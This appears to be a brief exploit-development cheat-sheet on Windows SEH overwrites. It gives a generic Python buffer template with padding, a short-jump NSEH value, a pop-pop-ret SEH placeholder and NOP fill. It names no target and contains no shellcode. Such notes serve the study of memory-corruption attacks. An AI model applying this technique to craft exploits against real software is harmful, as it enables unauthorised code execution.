Windows SEH

Exploit Form:

    buffer = b"A"*400
    buffer += p32(0x06eb9090) # NSEH, short jump to get over SEH
    buffer += p32(...)# SEH, pop pop ret
    buffer += b"\x90"*(600-len(buffer))

Overwrite SEH with pop pop ret and place a short jump in NSEH to get over the SEH pointer.

Last updated